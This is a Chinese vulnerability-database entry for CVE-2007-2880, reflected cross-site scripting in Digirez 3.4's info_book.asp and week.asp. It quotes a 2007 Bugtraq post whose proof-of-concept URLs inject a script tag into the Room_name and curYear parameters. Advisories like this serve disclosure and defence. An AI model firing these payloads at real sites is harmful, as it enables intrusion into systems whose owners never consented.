Digirez 'info_book.asp'跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1190425 漏洞类型 跨站脚本
发布时间 2007-05-29 更新时间 2007-05-29
CVE编号 CVE-2007-2880 CNNVD-ID CNNVD-200705-511
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://www.securityfocus.com/bid/81752
https://cxsecurity.com/issue/WLB-2007050088
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-511
|漏洞详情
Digirez中存在多个跨站脚本攻击漏洞。远程攻击者可以借助提交到room/info_book.asp的(1)Room_name参数或到room/week.asp的(2)curYear参数,注入任意的web脚本或HTML。
|漏洞EXP
Hello 
Vulnerable : Digirez 
Version: 3.4
web : http://www.digiappz.com

XSS :
1-
http://www.example.com/room/info_book.asp?Room_name=[XSS]
2-
http://www.example.com/room/week.asp?curYear=[XSS]

For Example u can put :
1-
http://www.example.com/room/info_book.asp?Room_name='><script>alert(1);<
/script>
2-
http://www.example.com/room/week.asp?curYear='><script>alert(1);</script
>

Discovered  By Linux_Drox
www.LeZr.Com

Best regards ,,
|受影响的产品
Digiappz Digirez 3.4
|参考资料

来源:BUGTRAQ
名称:20070525MultipleXSSinDigirez
链接:http://www.securityfocus.com/archive/1/archive/1/469589/100/0/threaded
来源:OSVDB
名称:36483
链接:http://osvdb.org/36483
来源:OSVDB
名称:36482
链接:http://osvdb.org/36482
来源:XF
名称:digirez-week-infobook-xss(34511)
链接:http://xforce.iss.net/xforce/xfdb/34511
来源:VUPEN
名称:ADV-2007-1960
链接:http://www.frsirt.com/english/advisories/2007/1960
来源:SREASON
名称:2738
链接:http://securityreason.com/securityalert/2738
来源:SECUNIA
名称:25422
链接:http://secunia.com/advisories/25422